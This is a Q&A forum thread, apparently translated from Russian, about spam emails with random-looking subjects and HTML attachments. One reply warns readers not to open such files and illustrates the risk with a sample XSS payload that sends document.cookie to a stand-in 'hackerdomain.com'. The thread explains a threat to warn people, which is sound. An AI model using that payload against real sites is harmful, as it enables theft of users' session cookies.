D
D
Dmitry X2021-09-24 09:42:39
Fight against spam
Dmitry X, 2021-09-24 09:42:39

What kind of strange letters come with numbers?

Letters come to the mail from unknown addresses in the subject of the letter there is a set of numbers and letters, and the content is numbers. I understand spam, they advertise something. And then what?

spoiler
614d7353180a1339084383.png

Answer the question

In order to leave comments, you need to log in

9 answer(s)
C
CityCat4, 2021-09-24
@CityCat4

There is an assumption that this is a kind of message that only those who know what it means can read. And they sent out a hundred thousand million addresses to disguise themselves as spam :)

T
Tanasy, 2021-09-24
@Tanasy

Today I received a similar message, in the file there was a simple line in js, which redirected to a scam project based on funding.
The link itself was encoded in base64.
I assume that this is a new type of spam, because. this is something new and headlines like: "Wallet", "Salary", "Gift"

K
Konstantin Tsvetkov, 2021-09-24
@tsklab

Attached file "Gifts".

H
Hanneman, 2021-09-24
@Hanneman

Open the attached page in the browser, and then draw conclusions.

V
Valentine Dagzio, 2021-09-24
@Dagzio

I strongly do not advise and do not recommend opening this attachment, because it is 99% a virus, at the moment there is a "trick" / "attack" through email. mail, just delete letters and block addresses

R
rPman, 2021-09-24
@rPman

Spam can be different, some messages are just information, the second ones are an attack attempt, the third ones are just an analysis of the spam activity of the customer base.
I could attach the file itself.
Most likely there are links in the document that the browser or mail client will open and the spammer will receive information that you opened the letter, for example, doctype does not refer to w3.org dtd, but to the spammer's server ([although browsers should not load dtd , but suddenly if it is different from the usual there)

A
Alexander, 2021-09-24
@Aleksandr-JS-Developer

Do not open the file in a browser.
There may be a redirect with a payload to a vulnerable site.
You may not use this site, but how would the sender know about it.

for example something like:
<sctipt>
location.href = `https://someweaksite.com/search?q=<img src="x" onerror="fetch('https://hackerdomain.com/getcookies?k='+document.cookie)">`;
</script>

T
Timur Khudiyev, 2021-09-26
@t_khudiyev

A week as they come a day for 2-3 letters. Blocking is of no use because it is always from different addresses.

Didn't find what you were looking for?

Ask your question

Ask a Question

731 491 924 answers to any question